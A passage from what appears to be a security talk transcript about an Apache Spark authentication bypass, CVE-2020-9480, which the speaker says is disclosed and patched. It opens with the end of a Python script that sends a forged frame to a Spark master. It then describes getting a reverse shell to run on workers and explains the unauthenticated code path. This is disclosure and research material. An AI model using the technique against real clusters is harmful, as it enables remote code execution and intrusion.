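frame += b"\x09"                                  # message-type byte, 0x09
frame += struct.pack(">I", len(payload))          # actual payload size
frame += payload

s = socket.create_connection(("spark-master.example", 7077))
s.sendall(frame)
time.sleep(5)        # give the master time to contact the workers and spawn executors
s.close()
```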
So, this is just a quick example to show you how to exploit this bug. This is the reverse shell that we want to execute, right? I just point Sparky at the cluster and ask it to execute this code, but as you can see, the cluster requires authentication. If I add that switch, though, it takes advantage of this bug, and you can see it bypassed authentication and executed the code directly, and it will execute it on as many workers as requested. So yeah, we just bypassed authentication and executed code on the workers, great. So now that we've seen the hacker's intuitive way of finding this bug, let's go through the code, because I think it's interesting. Remember, I made the distinction between payloads prefixed with 21 bytes of data and payloads prefixed with 13 bytes of data; it turns out there's actually a difference in the dispatcher. The RegisterApplication is handled by the one-way message handler, which calls the receive method of the RPC handler; it delegates to receive, and you can see that at no point is there any authentication going on here. The delegated receive will actually perform the work. If you compare that with the other receive method, the one that actually asks for authentication, you can see that it's quite beefy and different. The correction, basically the patch, was to protect that same receive method, and another one used in streaming which was also affected, with the same types of checks. This was labeled CVE-2020-9480. I disclosed it on the 24th of December, if I'm not mistaken, which was horrible timing for me. But anyway, it was fixed by the Apache Spark team, so thank you very much for the work that you guys have done, it's amazing. So, in summary, what I wanna say is: Spark is awesome, but too bad security is not taken seriously, and I'm not talking about the folks who manage security there; I'm just referring to the fact that security is off by default. I don't think that's something we should still have in 2020, especially for a framework that does data computation, and we all know how valuable data is. So I say it in reference to that, and I hope that will change. And finally, we only covered Spark standalone, where the cluster manager is the one doing the scheduling work, but you can have other setups where it's actually YARN doing that work, or, I think, even the Kubernetes API server in Spark 3. So yeah, there's a lot of ground to cover; if you wanna dig into it, go ahead. The code for Sparky is there, if you wanna check out these Spark APIs, the serialized objects being forged in order to bypass authentication, all that stuff. I hope you got enough out of this talk to actually dig into it, because that's really the only way to figure out how stuff works. Your contributions are most welcome, and if you wanna hit me up on Twitter to talk about it more, please do not hesitate. Looking forward to talking with you folks in the Q&A. Thank you very much. Bye bye.